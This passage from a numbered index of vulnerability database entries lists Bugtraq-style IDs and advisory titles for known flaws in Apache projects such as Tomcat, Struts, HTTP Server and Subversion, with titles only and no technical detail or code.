15761| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
15762| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
15763| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
15764| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
15765| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
15766| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
15767| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
15768| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
15769| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
15770| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
15771| [76933] Apache James Server Unspecified Command Execution Vulnerability
15772| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
15773| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
15774| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
15775| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
15776| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
15777| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
15778| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
15779| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
15780| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
15781| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
15782| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
15783| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
15784| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
15785| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
15786| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
15787| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
15788| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
15789| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
15790| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
15791| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
15792| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
15793| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
15794| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
15795| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
15796| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
15797| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
15798| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
15799| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
15800| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
15801| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
15802| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
15803| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
15804| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
15805| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
15806| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
15807| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
15808| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
15809| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
15810| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
15811| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
15812| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
15813| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
15814| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
15815| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
15816| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
15817| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
15818| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
15819| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
15820| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
15821| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
15822| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
15823| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
15824| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
15825| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
15826| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
15827| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
15828| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
15829| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
15830| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
15831| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
15832| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
15833| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
15834| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
15835| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
15836| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
15837| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
15838| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
15839| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
15840| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
15841| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
15842| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
15843| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
15844| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
15845| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
15846| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
15847| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
15848| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
15849| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
15850| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
15851| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
15852| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
15853| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
15854| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
15855| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
15856| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
15857| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
15858| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
15859| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
15860| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
15861| [68229] Apache Harmony PRNG Entropy Weakness
15862| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
15863| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
15864| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
15865| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
15866| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
15867| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
15868| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
15869| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
15870| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
15871| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
15872| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
15873| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
15874| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
15875| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
15876| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
15877| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
15878| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
15879| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
15880| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
15881| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
15882| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
15883| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
15884| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
15885| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
15886| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
15887| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
15888| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
15889| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
15890| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
15891| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
15892| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
15893| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
15894| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
15895| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
15896| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
15897| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
15898| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
15899| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
15900| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
15901| [64780] Apache CloudStack Unauthorized Access Vulnerability
15902| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
15903| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
15904| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
15905| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
15906| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
15907| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
15908| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
15909| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
15910| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
15911| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
15912| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
15913| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
15914| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
15915| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
15916| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
15917| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
15918| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
15919| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
15920| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
15921| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
15922| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
15923| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
15924| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
15925| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
15926| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
15927| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
15928| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
15929| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
15930| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
15931| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
15932| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
15933| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
15934| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
15935| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
15936| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
15937| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
15938| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
15939| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
15940| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
15941| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
15942| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
15943| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
15944| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
15945| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
15946| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
15947| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
15948| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
15949| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
15950| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
15951| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
15952| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
15953| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
15954| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
15955| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
15956| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
15957| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
15958| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
15959| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
15960| [59670] Apache VCL Multiple Input Validation Vulnerabilities
15961| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
15962| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
15963| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
15964| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
15965| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
15966| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
15967| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
15968| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
15969| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
15970| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
15971| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
15972| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
15973| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
15974| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
15975| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
15976| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
15977| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
15978| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
15979| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
15980| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
15981| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
15982| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
15983| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
15984| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
15985| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
15986| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
15987| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
15988| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
15989| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
15990| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
15991| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
15992| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
15993| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
15994| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
15995| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
15996| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
15997| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
15998| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
15999| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
16000| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
16001| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
16002| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
16003| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
16004| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
16005| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
16006| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
16007| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
16008| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
16009| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
16010| [54798] Apache Libcloud Man In The Middle Vulnerability
16011| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
16012| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
16013| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
16014| [54189] Apache Roller Cross Site Request Forgery Vulnerability
16015| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
16016| [53880] Apache CXF Child Policies Security Bypass Vulnerability
16017| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
16018| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
16019| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
16020| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
16021| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
16022| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
16023| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
16024| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
16025| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
16026| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
16027| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
16028| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
16029| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
16030| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
16031| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
16032| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
16033| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
16034| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
16035| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
16036| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
16037| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
16038| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
16039| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
16040| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
16041| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
16042| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
16043| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
16044| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
16045| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
16046| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
16047| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
16048| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
16049| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
16050| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
16051| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
16052| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
16053| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
16054| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
16055| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
16056| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
16057| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
16058| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
16059| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
16060| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
16061| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
16062| [49290] Apache Wicket Cross Site Scripting Vulnerability
16063| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
16064| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
16065| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
16066| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
16067| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
16068| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
16069| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
16070| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
16071| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
16072| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
16073| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
16074| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
16075| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
16076| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
16077| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
16078| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
16079| [46953] Apache MPM-ITK Module Security Weakness
16080| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
16081| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
16082| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
16083| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
16084| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
16085| [46166] Apache Tomcat JVM Denial of Service Vulnerability
16086| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
16087| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
16088| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
16089| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
16090| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
16091| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
16092| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
16093| [44616] Apache Shiro Directory Traversal Vulnerability
16094| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
16095| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
16096| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
16097| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
16098| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
16099| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
16100| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
16101| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
16102| [42492] Apache CXF XML DTD Processing Security Vulnerability
16103| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
16104| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
16105| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
16106| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
16107| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
16108| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
16109| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
16110| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
16111| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
16112| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
16113| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
16114| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
16115| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
16116| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
16117| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
16118| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
16119| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
16120| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
16121| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
16122| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
16123| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
16124| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
16125| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
16126| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
